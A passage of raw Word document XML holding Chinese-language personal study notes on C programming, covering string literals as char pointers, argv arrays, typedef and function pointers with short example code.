          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（字符串首地址）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027BD94C" w14:textId="2292EF08" w:rsidR="00BE0B4A" w:rsidRDefault="00295773" w:rsidP="00BE0B4A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符串本身隐式的写了一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>char[],</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>char*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的首地址可以直接以数组形式访问。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CE973C" w14:textId="0EDB3B98" w:rsidR="00295773" w:rsidRDefault="00295773" w:rsidP="00BE0B4A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数字没法办到这一点。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DFD4FA" w14:textId="77777777" w:rsidR="00295773" w:rsidRDefault="00295773" w:rsidP="00295773">
      <w:r>
        <w:t>#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FA5D20" w14:textId="77777777" w:rsidR="00295773" w:rsidRDefault="00295773" w:rsidP="00295773">
      <w:r>
        <w:t>int main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD37A73" w14:textId="77777777" w:rsidR="00295773" w:rsidRDefault="00295773" w:rsidP="00295773">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150D8837" w14:textId="77777777" w:rsidR="00295773" w:rsidRDefault="00295773" w:rsidP="00295773">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00295773">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>char *a = "hello";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432F51D0" w14:textId="77777777" w:rsidR="00295773" w:rsidRDefault="00295773" w:rsidP="00295773">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00295773">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">printf("%c\n", </w:t>
      </w:r>
      <w:r w:rsidRPr="00295773">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>a[2]</w:t>
      </w:r>
      <w:r w:rsidRPr="00295773">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09627C5F" w14:textId="77777777" w:rsidR="00295773" w:rsidRDefault="00295773" w:rsidP="00295773">
      <w:r>
        <w:t xml:space="preserve">    int b[] = {1, 2, 3, 4, 5};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44049A94" w14:textId="1B121145" w:rsidR="00295773" w:rsidRDefault="00295773" w:rsidP="00295773">
      <w:r>
        <w:t xml:space="preserve">    printf("%p\n", b);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAB09DC" w14:textId="77777777" w:rsidR="00295773" w:rsidRDefault="00295773" w:rsidP="00295773">
      <w:r>
        <w:t xml:space="preserve">    return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F53BDAD" w14:textId="5FA644EA" w:rsidR="00BE0B4A" w:rsidRPr="00295773" w:rsidRDefault="00295773" w:rsidP="00295773">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA6876C" w14:textId="77777777" w:rsidR="00BE0B4A" w:rsidRDefault="00BE0B4A" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E91B14F" w14:textId="58B4660D" w:rsidR="00BE0B4A" w:rsidRDefault="00295773" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更详细一些，</w:t>
      </w:r>
      <w:r w:rsidRPr="00295773">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>双引号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包裹的</w:t>
      </w:r>
      <w:r w:rsidRPr="00295773">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>字符串</w:t>
      </w:r>
      <w:r w:rsidRPr="00295773">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00295773">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>本质是字符数组</w:t>
      </w:r>
      <w:r w:rsidRPr="00295773">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，返回的就是</w:t>
      </w:r>
      <w:r w:rsidRPr="00295773">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>首地址（既</w:t>
      </w:r>
      <w:r w:rsidRPr="00295773">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>char*</w:t>
      </w:r>
      <w:r w:rsidRPr="00295773">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6306C324" w14:textId="5146E7BD" w:rsidR="00295773" w:rsidRPr="00295773" w:rsidRDefault="00295773" w:rsidP="00295773">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00295773">
        <w:lastRenderedPageBreak/>
        <w:t>char *argv[] = { "a", "b", "c", NULL };</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> // </w:t>
      </w:r>
      <w:r w:rsidRPr="00295773">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>这里是双引号包裹的，是字符串不是数组</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157919BE" w14:textId="77777777" w:rsidR="00295773" w:rsidRPr="00295773" w:rsidRDefault="00295773" w:rsidP="00295773">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00295773">
        <w:t xml:space="preserve">argv[0] </w:t>
      </w:r>
      <w:r w:rsidRPr="00295773">
        <w:t>是指向字符串</w:t>
      </w:r>
      <w:r w:rsidRPr="00295773">
        <w:t xml:space="preserve"> "a" </w:t>
      </w:r>
      <w:r w:rsidRPr="00295773">
        <w:t>的指针（即</w:t>
      </w:r>
      <w:r w:rsidRPr="00295773">
        <w:t xml:space="preserve"> char*</w:t>
      </w:r>
      <w:r w:rsidRPr="00295773">
        <w:t>），</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DD4372" w14:textId="77777777" w:rsidR="00295773" w:rsidRPr="00295773" w:rsidRDefault="00295773" w:rsidP="00295773">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00295773">
        <w:t xml:space="preserve">argv[1] </w:t>
      </w:r>
      <w:r w:rsidRPr="00295773">
        <w:t>是指向字符串</w:t>
      </w:r>
      <w:r w:rsidRPr="00295773">
        <w:t xml:space="preserve"> "b" </w:t>
      </w:r>
      <w:r w:rsidRPr="00295773">
        <w:t>的指针，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007159D0" w14:textId="77777777" w:rsidR="00295773" w:rsidRPr="00295773" w:rsidRDefault="00295773" w:rsidP="00295773">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00295773">
        <w:t xml:space="preserve">argv[2] </w:t>
      </w:r>
      <w:r w:rsidRPr="00295773">
        <w:t>是指向字符串</w:t>
      </w:r>
      <w:r w:rsidRPr="00295773">
        <w:t xml:space="preserve"> "c" </w:t>
      </w:r>
      <w:r w:rsidRPr="00295773">
        <w:t>的指针。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F1CF58" w14:textId="77777777" w:rsidR="00BE0B4A" w:rsidRDefault="00BE0B4A" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B94D37E" w14:textId="77777777" w:rsidR="00995DD3" w:rsidRDefault="00995DD3" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C6DB8B6" w14:textId="77777777" w:rsidR="00411E60" w:rsidRPr="00411E60" w:rsidRDefault="00411E60" w:rsidP="00411E60">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00411E60">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>char *cptr ="CSE@UNSW";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EA43D8" w14:textId="77777777" w:rsidR="00995DD3" w:rsidRDefault="00995DD3" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07DB1058" w14:textId="77777777" w:rsidR="00995DD3" w:rsidRDefault="00995DD3" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23E38AD7" w14:textId="14147C85" w:rsidR="00592C73" w:rsidRDefault="00592C73" w:rsidP="00592C73">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ypedef:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义新类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF541CD" w14:textId="77777777" w:rsidR="00592C73" w:rsidRDefault="00592C73" w:rsidP="00592C73"/>
    <w:p w14:paraId="1BE1C2B1" w14:textId="77777777" w:rsidR="00592C73" w:rsidRDefault="00592C73" w:rsidP="00592C73">
      <w:r>
        <w:t>C allows us to define new data type (names) via typedef:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF6BD38" w14:textId="77777777" w:rsidR="00592C73" w:rsidRDefault="00592C73" w:rsidP="00592C73"/>
    <w:p w14:paraId="1AC5DAAC" w14:textId="77777777" w:rsidR="00592C73" w:rsidRDefault="00592C73" w:rsidP="00592C73">
      <w:r>
        <w:t xml:space="preserve">typedef </w:t>
      </w:r>
      <w:r w:rsidRPr="00592C73">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ExistingDataType</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00592C73">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>NewTypeName</w:t>
      </w:r>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4916274E" w14:textId="77777777" w:rsidR="00592C73" w:rsidRDefault="00592C73" w:rsidP="00592C73"/>
    <w:p w14:paraId="6E06B008" w14:textId="71EEC01D" w:rsidR="00592C73" w:rsidRDefault="00592C73" w:rsidP="00592C73">
      <w:r>
        <w:t>Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5D7686" w14:textId="6F4CFE23" w:rsidR="00592C73" w:rsidRDefault="00592C73" w:rsidP="00592C73">
      <w:r w:rsidRPr="00592C73">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>typedef float Temperature;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A31B83D" w14:textId="5298BA03" w:rsidR="00592C73" w:rsidRPr="00592C73" w:rsidRDefault="00592C73" w:rsidP="00592C73">
      <w:r w:rsidRPr="00592C73">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>typedef int Matrix[20][20];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47655D47" w14:textId="77777777" w:rsidR="00592C73" w:rsidRDefault="00592C73" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3618CAEC" w14:textId="77777777" w:rsidR="00592C73" w:rsidRDefault="00592C73" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B190D32" w14:textId="77777777" w:rsidR="00C520D7" w:rsidRDefault="00C520D7" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="354A0574" w14:textId="541CF772" w:rsidR="00D333A3" w:rsidRDefault="006A6C61" w:rsidP="006A6C61">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数指针</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4CEF1A" w14:textId="5908496B" w:rsidR="006A6C61" w:rsidRDefault="00F21D28" w:rsidP="006A6C61">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我的理解，就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> typedef </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义一个名字，声明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数、返回值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是些啥。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6FC212" w14:textId="7C8D1EE4" w:rsidR="00F21D28" w:rsidRDefault="00F21D28" w:rsidP="006A6C61">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后这个名字，当作类型声明，快速复制其他名字的函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4B425F" w14:textId="79852815" w:rsidR="00F21D28" w:rsidRPr="00442CC2" w:rsidRDefault="00442CC2" w:rsidP="006A6C61">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00442CC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>注意，赋值给其他新函数名字的时候，后面的函数名字加不加</w:t>
      </w:r>
      <w:r w:rsidRPr="00442CC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00442CC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>都可以，因为</w:t>
      </w:r>
      <w:r w:rsidRPr="00442CC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00442CC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>会实际将其处理为函数地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4032BFE9" w14:textId="77777777" w:rsidR="006A6C61" w:rsidRPr="006A6C61" w:rsidRDefault="006A6C61" w:rsidP="006A6C61">
      <w:r w:rsidRPr="006A6C61">
        <w:br/>
        <w:t>// Define a function pointer type, which points to a function</w:t>
      </w:r>
      <w:r w:rsidRPr="006A6C61">
        <w:br/>
        <w:t>typedef int (</w:t>
      </w:r>
      <w:r w:rsidRPr="006A6C61">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>*ComparatorFuncPtr</w:t>
      </w:r>
      <w:r w:rsidRPr="006A6C61">
        <w:t>)(int, int);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14702B8C" w14:textId="77777777" w:rsidR="006A6C61" w:rsidRPr="006A6C61" w:rsidRDefault="006A6C61" w:rsidP="006A6C61"/>
    <w:p w14:paraId="2A79A273" w14:textId="6A849703" w:rsidR="00D333A3" w:rsidRDefault="006A6C61" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="006A6C61">
        <w:t xml:space="preserve">int </w:t>
      </w:r>
      <w:r w:rsidRPr="006A6C61">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>IsLarger</w:t>
      </w:r>
      <w:r w:rsidRPr="006A6C61">
        <w:t>(int a, int b) {</w:t>
      </w:r>
      <w:r w:rsidRPr="006A6C61">
        <w:br/>
        <w:t xml:space="preserve">    return a &gt; b;</w:t>
      </w:r>
      <w:r w:rsidRPr="006A6C61">
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="006A6C61">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9705E6" w14:textId="77777777" w:rsidR="006A6C61" w:rsidRPr="006A6C61" w:rsidRDefault="006A6C61" w:rsidP="006A6C61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="006A6C61">
        <w:t xml:space="preserve">ComparatorFuncPtr fptr = </w:t>
      </w:r>
      <w:r w:rsidRPr="006A6C61">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&amp;IsLarger</w:t>
      </w:r>
      <w:r w:rsidRPr="006A6C61">
        <w:t xml:space="preserve">;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DA37CE" w14:textId="77777777" w:rsidR="006A6C61" w:rsidRDefault="006A6C61" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C9C586C" w14:textId="77777777" w:rsidR="00442CC2" w:rsidRDefault="00442CC2" w:rsidP="00442CC2">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B6B04C" w14:textId="77777777" w:rsidR="00DF2A82" w:rsidRDefault="00442CC2" w:rsidP="00442CC2">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00442CC2">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>typedef int (*</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2A82">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ComparatorFuncPtr</w:t>
      </w:r>
      <w:r w:rsidRPr="00442CC2">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>)(int, int);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE6F057" w14:textId="787B8BFF" w:rsidR="00442CC2" w:rsidRPr="00442CC2" w:rsidRDefault="00442CC2" w:rsidP="00442CC2">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00442CC2">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00442CC2">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>int IsLarger(int a, int b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9F21C1" w14:textId="77777777" w:rsidR="00442CC2" w:rsidRPr="00442CC2" w:rsidRDefault="00442CC2" w:rsidP="00442CC2">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00442CC2">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    return a &gt; b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDED562" w14:textId="77777777" w:rsidR="00442CC2" w:rsidRPr="00442CC2" w:rsidRDefault="00442CC2" w:rsidP="00442CC2">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00442CC2">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ACFC81" w14:textId="77777777" w:rsidR="00442CC2" w:rsidRPr="00442CC2" w:rsidRDefault="00442CC2" w:rsidP="00442CC2">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="415F838E" w14:textId="77777777" w:rsidR="00442CC2" w:rsidRPr="00442CC2" w:rsidRDefault="00442CC2" w:rsidP="00442CC2">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF2A82">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">ComparatorFuncPtr </w:t>
      </w:r>
      <w:r w:rsidRPr="00442CC2">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">fptr1 = </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2A82">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>IsLarger</w:t>
      </w:r>
      <w:r w:rsidRPr="00442CC2">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>;  // Implicit pointer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0846BC41" w14:textId="77777777" w:rsidR="00442CC2" w:rsidRPr="00442CC2" w:rsidRDefault="00442CC2" w:rsidP="00442CC2">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF2A82">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">ComparatorFuncPtr </w:t>
      </w:r>
      <w:r w:rsidRPr="00442CC2">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">fptr2 = </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2A82">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&amp;IsLarger</w:t>
      </w:r>
      <w:r w:rsidRPr="00442CC2">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>; // Explicit pointer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB0AFAE" w14:textId="77777777" w:rsidR="00442CC2" w:rsidRPr="00442CC2" w:rsidRDefault="00442CC2" w:rsidP="00442CC2">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4150642D" w14:textId="77777777" w:rsidR="00442CC2" w:rsidRPr="00442CC2" w:rsidRDefault="00442CC2" w:rsidP="00442CC2">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00442CC2">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>int result1 = fptr1(5, 3);  // Calls IsLarger(5, 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E2410F" w14:textId="441FF481" w:rsidR="00442CC2" w:rsidRDefault="00442CC2" w:rsidP="00442CC2">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00442CC2">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>int result2 = fptr2(5, 3);  // Also calls IsLarger(5, 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B76F56" w14:textId="77777777" w:rsidR="00442CC2" w:rsidRDefault="00442CC2" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="054E8544" w14:textId="568DA944" w:rsidR="006A6C61" w:rsidRDefault="00F82FE4" w:rsidP="00F82FE4">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ChatGPT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>示例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E708929" w14:textId="77777777" w:rsidR="00F82FE4" w:rsidRDefault="00F82FE4" w:rsidP="00F82FE4"/>
    <w:p w14:paraId="60530DDF" w14:textId="46144754" w:rsidR="00F82FE4" w:rsidRDefault="00F82FE4" w:rsidP="00F82FE4">
      <w:r w:rsidRPr="00F82FE4">
        <w:t>typedef int (*ComparatorFuncPtr)(int, int);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F58150D" w14:textId="77777777" w:rsidR="00F82FE4" w:rsidRDefault="00F82FE4" w:rsidP="00F82FE4"/>
    <w:p w14:paraId="1CE19496" w14:textId="77777777" w:rsidR="00F82FE4" w:rsidRDefault="00F82FE4" w:rsidP="00F82FE4">
      <w:r>
        <w:t xml:space="preserve">int </w:t>
      </w:r>
      <w:r w:rsidRPr="00F21D28">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>compare</w:t>
      </w:r>
      <w:r>
        <w:t>(int a, int b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150DF51E" w14:textId="77777777" w:rsidR="00F82FE4" w:rsidRDefault="00F82FE4" w:rsidP="00F82FE4">
      <w:r>
        <w:t xml:space="preserve">    return a - b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53814355" w14:textId="77777777" w:rsidR="00F82FE4" w:rsidRDefault="00F82FE4" w:rsidP="00F82FE4">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21010001" w14:textId="77777777" w:rsidR="00F82FE4" w:rsidRDefault="00F82FE4" w:rsidP="00F82FE4"/>
